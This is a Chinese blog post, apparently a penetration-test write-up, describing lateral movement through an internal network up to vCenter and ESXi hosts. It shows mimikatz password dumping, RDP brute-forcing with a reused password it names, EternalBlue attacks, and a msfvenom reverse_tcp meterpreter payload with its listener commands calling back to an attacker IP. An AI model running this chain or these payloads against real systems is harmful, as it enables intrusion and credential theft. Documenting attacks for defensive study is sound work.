Loading


目录
  1. 1. 介绍
  2. 2. 攻击路径
    1. 2.1. 10.46.1.16
    2. 2.2. 192.168.122.16->192.168.122.11
    3. 2.3. 192.168.122.11->192.168.122.15
    4. 2.4. 192.168.122.15->192.168.122.54->192.168.122.60
    5. 2.5. 192.168.122.60->192.168.122.8->192.168.122.6
内网渗透

在上次拿下了一台内网主机后,将其作为跳板,对192.168/16网段进行了扫描

介绍

先上一张内网环境拓扑图

1568903322779

经过扫描后,识别出几个重要资产,并将他们作为目标进行针对性的测试

192.168.122.8
192.168.122.11
192.168.122.12
192.168.122.13
192.168.122.15
192.168.122.16
192.168.122.54
192.168.122.60

1568901397651

通过banner80端口title

识别到的资产如下

192.168.101.3->锐捷交换机

1568901498643

192.168.135.1->锐捷AC控制器,下联5个AP

1568901527565

192.168.122.8->VMware vCenter主机

1568901579163

192.168.122.6-> ESXi主机

1568903430349

内网大杀器MS17-010的扫描结果

1568901642587

攻击路径:10.46.1.16=192.168.122.16->192.168.122.11->192.168.122.15->192.168.122.54->192.168.122.60->192.168.122.8->192.168.122.6

攻击路径

10.46.1.16

MSSQL弱口令+IIS7web服务无webshell,见上一篇博客

192.168.122.16->192.168.122.11

使用自行创建的管理员权限的asp.net账户登录后,运行mimikatz抓到了administrator用户的密码

1568903727776

然后使用administrator用户登录192.168.122.16,发现在mstsc中有192.168.122.11的历史连接记录并且保存了帐号密码,连接上后发现是administrator用户,再次抓取192.168.122.11密码,发现密码与.16的一样,并且在桌面发现了数据库连接密码,保存备用

192.168.122.11->192.168.122.15

由于内网中已有2台主机密码一样,将密码做成字典后对192.168.122.0/24进行了RDP爆破,发现192.168.122.15的密码也为Dell123456,逐拿下第三台

192.168.122.15->192.168.122.54->192.168.122.60

由于192.168.122.60这台主机存在ms17-010漏洞,MSF的代理隧道不稳定,决定利用BPF中的Eternalblue模块进行攻击,对相关文件进行代理设置后

1568904161142

由kali机生成meterpreter木马并设置监听

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.16.11.85 LPORT=4444 -f dll >~/backdoor_x64.dll

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > set lhost 10.16.11.85
lhost => 10.16.11.85
msf5 exploit(multi/handler) > run

设置好BPF后,对192.168.122.54进行了攻击并获得了一个system权限的shell

1568904281983

1568904349365

随后使用mimikatz读密码

1568904374468

1568904407381

得到密码为[email protected],同样的方法对192.168.122.60进行了攻击,密码一样为[email protected],同时check出这两台机器为虚拟机

1568904525836

由于内网中存在2台虚拟机管理系统,逐将密码保存备用

192.168.122.60->192.168.122.8->192.168.122.6

通过之前的密码分析,推断出管理员有喜爱使用同一密码的爱好,于是大胆猜测vCenter主机的密码也为[email protected],登录后确实如此

1568904853069

由于本人之前部署过vCenterESXi,其默认用户名为[email protected]root,尝试使用[email protected]登录后,两台主机(或者说一台)沦陷

1568904990106

1568905005051

文章作者: Sp4ce
文章链接: https://0x20h.com/p/69e0.html
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Sp4ce's Blog

评论